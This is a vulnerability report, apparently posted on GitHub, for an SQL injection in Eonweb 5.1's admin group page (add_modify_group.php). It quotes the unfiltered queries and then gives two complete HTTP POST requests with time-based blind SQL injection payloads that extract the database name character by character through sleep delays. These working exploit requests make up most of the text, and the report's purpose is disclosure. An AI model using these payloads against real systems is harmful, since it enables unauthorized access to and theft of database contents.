Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
Eonweb_module_admin_group_add_modify_group.php function insert_group has SQL injection vulnerability
Powered by Shaojie Jiang from 360 SkyEye Labs
version: 5.1
https://github.com/EyesOfNetworkCommunity/eonweb
Vulnerability details
# 0x01
module/admin_group/add_modify_group.php Line 179
$group_exist=mysqli_result(sqlrequest("$database_eonweb","SELECT count('group_name') from groups where group_name='$group_name';"),0);
Line 189
$group_ldap=sqlrequest("$database_eonweb","SELECT dn from ldap_groups_extended where group_name='$group_name';");
$group_name has not been filtered to cause SQL injection vulnerability
EXP:
POST https://192.168.242.128/module/admin_group/add_modify_group.php HTTP/1.1
Host: 192.168.242.128
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
Referer: https://192.168.242.128/module/admin_group/add_modify_group.php
Cookie: session_id=602820757; user_name=admin; user_id=1; user_limitation=0; group_id=1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
group_id=&group_name=jsj' and sleep( if(ascii(substr(database(),1,1))=102,0,5 )) %23&group_descr=jsj123&tab_1=1&tab_2=1&tab_3=1&tab_4=1&tab_5=1&tab_6=1&tab_7=1&add=add
The page will be delayed for 10 seconds
-------------------------------------------
if you send :
POST https://192.168.242.128/module/admin_group/add_modify_group.php HTTP/1.1
Host: 192.168.242.128
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
Referer: https://192.168.242.128/module/admin_group/add_modify_group.php
Cookie: session_id=602820757; user_name=admin; user_id=1; user_limitation=0; group_id=1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
group_id=&group_name=jsj' and sleep( if(ascii(substr(database(),1,1))=101,0,5 )) %23&group_descr=jsj123&tab_1=1&tab_2=1&tab_3=1&tab_4=1&tab_5=1&tab_6=1&tab_7=1&add=add
The page will be delayed for 0 seconds